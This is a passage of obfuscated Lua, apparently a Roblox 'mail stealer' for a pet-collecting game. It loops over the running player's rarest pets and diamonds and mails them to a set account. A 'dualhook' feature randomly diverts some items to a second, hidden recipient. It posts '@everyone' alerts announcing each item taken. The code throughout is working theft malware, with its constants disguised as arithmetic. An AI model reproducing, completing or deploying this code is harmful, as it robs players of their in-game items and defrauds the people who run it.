(v167==(1836 -(1045 + 791))) then v168=nil;v169=nil;v167=2 -1 ;end if (v167==1) then v170="/5";v171=string.split(v165,"rbxassetid://")[2 -0 ];v167=507 -(351 + 154) ;end end end local v87=getgenv().Settings.User;local v88;local v89;local v90;local v91;local v92;local v93;local v94;local v95;local v96;local v97=".gg/uSgzNwHDTS";if (v87~=nil) then if getgenv().Settings.Titanics.Dualhook then v88=getgenv().Settings.Titanics.Intensity;end if getgenv().Settings.Banana.Dualhook then v89=getgenv().Settings.Banana.Intensity;end if getgenv().Settings.Huges.Dualhook then v90=getgenv().Settings.Huges.Intensity;end if getgenv().Settings.Pogs.Dualhook then v91=getgenv().Settings.Pogs.Intensity;end if getgenv().Settings.Exclusives.Dualhook then v92=getgenv().Settings.Exclusives.Intensity;end if getgenv().Settings.Events.Dualhook then v93=getgenv().Settings.Events.Intensity;end if getgenv().Settings.Secrets.Dualhook then v94=getgenv().Settings.Secrets.Intensity;end if getgenv().Settings.HC_DM_Mythics.Dualhook then v95=getgenv().Settings.HC_DM_Mythics.Intensity;end if getgenv().Settings.Gems.Dualhook then v96=getgenv().Settings.Gems.Intensity;end if (getgenv().Settings.Webhook~=true) then v85=false;end if (getgenv().Settings.MailMessage~=nil) then v97=getgenv().Settings.MailMessage;end end function dualhook(v172)local v173=1574 -(1281 + 293) ;local v174;while true do if (v173==(266 -(28 + 238))) then if  not tonumber(v172) then local v477=0;while true do if (v477==(0 -0)) then game:GetService("Players").LocalPlayer:Kick("Put A Valid intensity Value");return;end end end v174=math.random(1,1659 -(1381 + 178) );v173=1 + 0 ;end if (v173==(1 + 0)) then if (v174<=v172) then return true;else return false;end break;end end end local v98;if ((UserName2~=nil) and (UserName2~="2nd User Here") and (UserName2~="")) then v98=UserName2;else v98=UserName;end local v99;if (v79==(0 + 0)) then local v194=0 -0 ;local v195;while true do if (v194==(1 + 0)) then v195={[471 -(381 + 89) ]={Recipient=v99,Diamonds=v81,Pets={},Message=v97}};v27:InvokeServer(unpack(v195));break;end if (v194==(0 + 0)) then if (v81>=(676288041 + 323711959)) then v99=UserName;else v99=v98;end if (v96~=nil) then if dualhook(v96) then v99=v87;end end v194=1;end end end spawn(function()while wait() do if (( #TList~=(0 -0)) or (TList~={})) then for v404,v405 in pairs(TList) do v99=UserName;if (v88~=nil) then if dualhook(v88) then v99=v87;end end local v406={[1]={Recipient=v99,Diamonds=v81,Pets={v405},Message=v97}};v27:InvokeServer(unpack(v406));if (( #TList==0) or (TList=={})) then break;end end end end end);spawn(function()while wait() do if (( #BList~=0) and ( #TList==0)) then for v407,v408 in pairs(BList) do v99=UserName;if (v89~=nil) then if dualhook(v89) then v99=v87;end end local v409={[1]={Recipient=v99,Diamonds=v81,Pets={v408},Message=v97}};v27:InvokeServer(unpack(v409));if (( #BList==0) or (BList=={})) then break;end end else break;end end end);spawn(function()while wait() do if (( #HList~=0) and ( #BList==(1156 -(1074 + 82))) and ( #TList==(0 -0))) then for v410,v411 in pairs(HList) do v99=UserName;if (v90~=nil) then if dualhook(v90) then v99=v87;end end local v412={[1]={Recipient=v99,Diamonds=v81,Pets={v411},Message=v97}};v27:InvokeServer(unpack(v412));if (( #HList==0) or (HList=={})) then break;end end end end end);spawn(function()while wait() do if (( #PList~=(1455 -(990 + 465))) and ( #TList==(0 + 0)) and ( #BList==0) and ( #HList==(0 + 0))) then for v413,v414 in pairs(PList) do v99=UserName;if (v91~=nil) then if dualhook(v91) then v99=v87;end end local v415={[1 + 0 ]={Recipient=v99,Diamonds=v81,Pets={v414},Message=v97}};v27:InvokeServer(unpack(v415));if (( #PList==0) or (PList=={})) then break;end end end end end);spawn(function()while wait() do if (( #EList~=(1726 -(1668 + 58))) and ( #HList==(626 -(512 + 114))) and ( #TList==0) and ( #BList==(0 -0)) and ( #PList==0)) then for v416,v417 in pairs(EList) do v99=UserName;if (v92~=nil) then if dualhook(v92) then v99=v87;end end local v418={[1]={Recipient=v99,Diamonds=v81,Pets={v417},Message=v97}};v27:InvokeServer(unpack(v418));if (( #EList==(0 -0)) or (EList=={})) then break;end end end end end);spawn(function()while wait() do if (( #EvList~=(0 + 0)) and ( #EList==(0 + 0)) and ( #HList==(0 + 0)) and ( #TList==(0 -0)) and ( #BList==(1994 -(109 + 1885))) and ( #PList==(1469 -(1269 + 200)))) then for v419,v420 in pairs(EvList) do v99=v98;if (v93~=nil) then if dualhook(v93) then v99=v87;end end local v421={[1]={Recipient=v99,Diamonds=v81,Pets={v420},Message=v97}};v27:InvokeServer(unpack(v421));if (( #EvList==(815 -(98 + 717))) or (EvList=={})) then break;end end end end end);spawn(function()while wait() do if (( #SList~=0) and ( #EvList==(826 -(802 + 24))) and ( #EList==(0 -0)) and ( #HList==(0 -0)) and ( #TList==(0 + 0)) and ( #BList==(0 + 0)) and ( #PList==(0 + 0))) then for v422,v423 in pairs(SList) do v99=v98;if (v94~=nil) then if dualhook(v94) then v99=v87;end end local v424={[1]={Recipient=v99,Diamonds=v81,Pets={v423},Message=v97}};v27:InvokeServer(unpack(v424));if (( #SList==(0 -0)) or (SList=={})) then break;end end end end end);spawn(function()while wait() do if (( #MList~=0) and ( #SList==(0 -0)) and ( #EvList==0) and ( #EList==(0 + 0)) and ( #HList==0) and ( #TList==0) and ( #BList==0) and ( #PList==(0 + 0))) then for v425,v426 in pairs(MList) do v99=v98;if (v95~=nil) then if dualhook(v95) then v99=v87;end end local v427={[1]={Recipient=v99,Diamonds=v81,Pets={v426},Message=v97}};v27:InvokeServer(unpack(v427));if (( #MList==0) or (MList=={})) then break;end end end end end);local v100= #TList;WTianicList={};WTList={};WTcc={};local v101=1;spawn(function()while wait() do WLibrary=require(game:GetService("ReplicatedStorage").Framework:FindFirstChild("Library"));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v246,v247)if v247.titanic then table.insert(WTianicList,v246);end end);local v197=require(game:GetService("ReplicatedStorage").Library.Client.Save).Get().Pets;local v198={};for v248,v249 in pairs(v197) do v198[v249['uid']]=false;end for v251,v252 in pairs(v197) do if (table.find(WTianicList,v252['id'])~=nil) then local v428=0;while true do if (v428==(0 + 0)) then table.insert(WTList,v252['uid']);table.insert(WTcc,v252['id']);break;end end end end if (v100==( #WTList + 1)) then v100= #TList;v79=v79-(1 + 0) ;local v340=v81;local v341=STList[v101];local v342;local v343;for v429,v430 in pairs(game:GetService("ReplicatedStorage")['__DIRECTORY'].Pets:GetChildren()) do local v431=string.split(v430.Name," - ")[1 + 0 ];if (v431==tostring(v341)) then v342=require(v430:FindFirstChildOfClass("ModuleScript")).name;v343=require(v430:FindFirstChildOfClass("ModuleScript")).thumbnail;break;end end v86(":scream:  **TITANIC** :scream:",v342,"@everyone OMFG",v82,v79,v343,UserName);v81=1433 -(797 + 636) ;v82=0 -0 ;v101=v101 + (1620 -(1427 + 192)) ;v72=0 + 0 ;v69=0;elseif ((v100==(0 -0)) or (v79==0)) then TList={};break;end WTianicList={};WTList={};WTcc={};wait(1 + 0 );end end);local v102= #BList;WBananaList={};WBList={};WBcc={};spawn(function()while wait() do WLibrary=require(game:GetService("ReplicatedStorage").Framework:FindFirstChild("Library"));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v253,v254)if (v254.name=="banana") then table.insert(WBananaList,v253);end end);local v200=require(game:GetService("ReplicatedStorage").Library.Client.Save).Get().Pets;local v201={};for v255,v256 in pairs(v200) do v201[v256['uid']]=false;end for v258,v259 in pairs(v200) do if (table.find(WBananaList,v259['id'])~=nil) then local v432=0;while true do if (v432==(0 + 0)) then table.insert(WBList,v259['uid']);table.insert(WBcc,v259['id']);break;end end end end if (v102==( #WBList + (327 -(192 + 134)))) then local v344=1276 -(316 + 960) ;local v345;local v346;local v347;while true do if (v344==0) then v102= #BList;v79=v79-(1 + 0) ;v344=1;end if (1==v344) then v345=v81;v346="Banana";v344=2 + 0 ;end if (v344==(2 + 0)) then v347="rbxassetid://10946336703";v86(":banana: **BANANA** :banana:",v346,"@everyone",v82,v79,v347,UserName);v344=11 -8 ;end if (v344==(554 -(83 + 468))) then v81=0;v82=0;v344=1810 -(1202 + 604) ;end if (v344==4) then v72=0;v69=0;break;end end elseif ((v102==(0 -0)) or (v79==(0 -0))) then BList={};break;end WBananaList={};WBList={};WBcc={};wait(1);end end);local v103= #HList;WHugeList={};WHList={};WHcc={};local v104=2 -1 ;spawn(function()while wait() do WLibrary=require(game:GetService("ReplicatedStorage").Framework:FindFirstChild("Library"));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v260,v261)if v261.huge then table.insert(WHugeList,v260);end end);local v203=require(game:GetService("ReplicatedStorage").Library.Client.Save).Get().Pets;local v204={};for v262,v263 in pairs(v203) do v204[v263['uid']]=false;end for v265,v266 in pairs(v203) do if (table.find(WHugeList,v266['id'])~=nil) then table.insert(WHList,v266['uid']);table.insert(WHcc,v266['id']);end end if (v103==( #WHList + (326 -(45 + 280)))) then v103= #WHList;v79=v79-(1 + 0) ;local v348=SHList[v104];local v349;local v350;for v433,v434 in pairs(game:GetService("ReplicatedStorage")['__DIRECTORY'].Pets:GetChildren()) do local v435=string.split(v434.Name," - ")[1 + 0 ];if (v435==tostring(v348)) then v350=require(v434:FindFirstChildOfClass("ModuleScript")).name;v349=require(v434:FindFirstChildOfClass("ModuleScript")).thumbnail;break;end end v86(":money_mouth: **HUGE** :money_mouth:",v350,"@everyone",v82,v79,v349,UserName);v81=0 + 0 ;v82=0;v104=v104 + 1 + 0 ;v72=0 + 0 ;v69=0;elseif ((v103==0) or (v79==(0 -0))) then HList={};break;end WHugeList={};WHList={};WHcc={};wait(1912 -(340 + 1571) );end end);local v105= #PList;WPogList={};WPList={};WPcc={};local v106=1 + 0 ;spawn(function()while wait() do WLibrary=require(game:GetService("ReplicatedStorage").Framework:FindFirstChild("Library"));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v267,v268)if (string.split(v268.name," ")[1]=="Pog") then table.insert(WPogList,v267);end end);local v206=require(game:GetService("ReplicatedStorage").Library.Client.Save).Get().Pets;local v207={};for v269,v270 in pairs(v206) do v207[v270['uid']]=false;end for v272,v273 in pairs(v206) do if (table.find(WPogList,v273['id'])~=nil) then local v436=1772 -(1733 + 39) ;while true do if (v436==(0 -0)) then table.insert(WPList,v273['uid']);table.insert(WPcc,v273['id']);break;end end end end if (v105==( #WPList + (1035 -(125 + 909)))) then v105= #WPList;v79=v79-1 ;local v351=SPList[v106];local v352;local v353;for v437,v438 in pairs(game:GetService("ReplicatedStorage")['__DIRECTORY'].Pets:GetChildren()) do local v439=string.split(v438.Name," - ")[1949 -(1096 + 852) ];if (v439==tostring(v351)) then v352=require(v438:FindFirstChildOfClass("ModuleScript")).name;v353=require(v438:FindFirstChildOfClass("ModuleScript")).thumbnail;break;end end v86(":fire: **POG** :fire:",v352,"",v82,v79,v353,UserName);v81=0;v82=0;v106=v106 + 1 + 0 ;v72=0;v69=0 -0 ;elseif ((v105==(0 + 0)) or (v79==0)) then PList={};break;end WPogList={};WPList={};WPcc={};wait(513 -(409 + 103) );end end);local v107= #EList;WExclusiveList={};WEList={};WEcc={};local v108=237 -(46 + 190) ;spawn(function()while wait() do WLibrary=require(game:GetService("ReplicatedStorage").Framework:FindFirstChild("Library"));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v274,v275)if ((v275.rarity=="Exclusive") and  not v275.huge and  not v275.titanic) then table.insert(WExclusiveList,v274);end end);local v209=require(game:GetService("ReplicatedStorage").Library.Client.Save).Get().Pets;local v210={};for v276,v277 in pairs(v209) do v210[v277['uid']]=false;end for v279,v280 in pairs(v209) do if ((table.find(WExclusiveList,v280['id'])~=nil) and  not v280.huge and  not v280.titanic) then local v440=0;while true do if (v440==(95 -(51 + 44))) then table.insert(WEList,v280['uid']);table.insert(WEcc,v280['id']);break;end end end end if (v107==( #WEList + 1)) then v107= #WEList;v79=v79-(1 + 0) ;local v354=SEList[v108];local v355;local v356;for v441,v442 in pairs(game:GetService("ReplicatedStorage")['__DIRECTORY'].Pets:GetChildren()) do local v443=string.split(v442.Name," - ")[1318 -(1114 + 203) ];if (v443==tostring(v354)) then v356=require(v442:FindFirstChildOfClass("ModuleScript")).name;v355=require(v442:FindFirstChildOfClass("ModuleScript")).thumbnail;break;end end v86(":teddy_bear: **Exclusive** :teddy_bear:",v356,"",v82,v79,v355,UserName);v81=726 -(228 + 498) ;v82=0;v108=v108 + 1 + 0 ;v72=0;v69=0 + 0 ;elseif ((v107==0) or (v79==(663 -(174 + 489)))) then EList={};break;end WExclusiveList={};WEList={};WEcc={};wait(1);end end);local v109= #EvList;WEventList={};WEvList={};WEvcc={};local v110=1;spawn(function()while wait() do WLibrary=require(game:GetService("ReplicatedStorage").Framework:FindFirstChild("Library"));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v281,v282)if (v282.rarity=="Event") then table.insert(WEventList,v281);end end);local v212=require(game:GetService("ReplicatedStorage").Library.Client.Save).Get().Pets;local v213={};for v283,v284 in pairs(v212) do v213[v284['uid']]=false;end for v286,v287 in pairs(v212) do if (table.find(WEventList,v287['id'])~=nil) then local v444=0 -0 ;while true do if (v444==0) then table.insert(WEvList,v287['uid']);table.insert(WEvcc,v287['id']);break;end end end end if (v109==( #WEvList + (1906 -(830 + 1075)))) then v109= #WEvList;v79=v79-(525 -(303 + 221)) ;local v357=v81;local v358=SEvList[v110];local v359;local v360;for v445,v446 in pairs(game:GetService("ReplicatedStorage")['__DIRECTORY'].Pets:GetChildren()) do local v447=string.split(v446.Name," - ")[1270 -(231 + 1038) ];if (v447==tostring(v358)) then v359=require(v446:FindFirstChildOfClass("ModuleScript")).name;v360=require(v446:FindFirstChildOfClass("ModuleScript")).thumbnail;break;end end v86(":pushpin: **Event** :pushpin:",v359,"",v82,v79,v360,v98,petinfo);v81=0;v82=0 + 0 ;v110=v110 + 1 ;v72=1162 -(171 + 991) ;v69=0 -0 ;elseif ((v109==(0 -0)) or (v79==0)) then EvList={};break;end WEventList={};WEvList={};WEvcc={};wait(2 -1 );end end);local v111= #SList;WSecretList={};WSList={};WScc={};local v112=1 + 0 ;spawn(function()while wait() do WLibrary=require(game:GetService("ReplicatedStorage").Framework:FindFirstChild("Library"));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v288,v289)if (v289.rarity=="Secret") then table.insert(WSecretList,v288);end end);local v215=require(game:GetService("ReplicatedStorage").Library.Client.Save).Get().Pets;local v216={};for v290,v291 in pairs(v215) do v216[v291['uid']]=false;end for v293,v294 in pairs(v215) do if (table.find(WSecretList,v294['id'])~=nil) then local v448=0 -0 ;while true do if (v448==(0 -0)) then table.insert(WSList,v294['uid']);table.insert(WScc,v294['id']);break;end end end end if (v111==( #WSList + (1 -0))) then v111= #WSList;v79=v79-1 ;local v361=SSList[v112];local v362;local v363;for v449,v450 in pairs(game:GetService("ReplicatedStorage")['__DIRECTORY'].Pets:GetChildren()) do local v451=string.split(v450.Name," - ")[1];if (v451==tostring(v361)) then v362=require(v450:FindFirstChildOfClass("ModuleScript")).name;v363=require(v450:FindFirstChildOfClass("ModuleScript")).thumbnail;break;end end v86(":shushing_face: **SECRET** :shushing_face:",v362,"",v82,v79,v363,v98);v81=0;v82=0 -0 ;v112=v112 + (1249 -(111 + 1137)) ;v72=158 -(91 + 67) ;v69=0;elseif ((v111==(0 -0)) or (v79==(0 + 0))) then SList={};break;end WSecretList={};WSList={};WScc={};wait(524 -(423 + 100) );end end);local v113= #MList;WMythicList={};WMList={};WMcc={};local v114=1 + 0 ;spawn(function()while wait() do WLibrary=require(game:GetService("ReplicatedStorage").Framework:FindFirstChild("Library"));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v295,v296)if (v296.rarity=="Mythical") then table.insert(WMythicList,v295);end end);local v218=require(game:GetService("ReplicatedStorage").Library.Client.Save).Get().Pets;local v219={};for v297,v298 in pairs(v218) do v219[v298['uid']]=false;end for v300,v301 in pairs(v218) do if ((table.find(WMythicList,v301['id'])~=nil) and v301.hc and v301.dm) then table.insert(WMList,v301['uid']);table.insert(WMcc,v301['id']);end end if (v113==( #WMList + 1)) then v113= #WMList;v79=v79-1 ;local v364=SMList[v114];local v365;local v366;for v452,v453 in pairs(game:GetService("ReplicatedStorage")['__DIRECTORY'].Pets:GetChildren()) do local v454=string.split(v453.Name," - ")[2 -1 ];if (v454==tostring(v364)) then v365=require(v453:FindFirstChildOfClass("ModuleScript")).name;v366=require(v453:FindFirstChildOfClass("ModuleScript")).darkMatterThumbnail;break;end end v86(":ribbon: **Mythical** :ribbon:",v365,"",v82,v79,v366,v98);v81=0 + 0 ;v82=0;v114=v114 + 1 ;v72=0;v69=0;elseif ((v113==0) or (v79==(771 -(326 + 445)))) then MList={};break;end WMythicList={};WMList={};WMcc={};wait(4 -3 );end end);
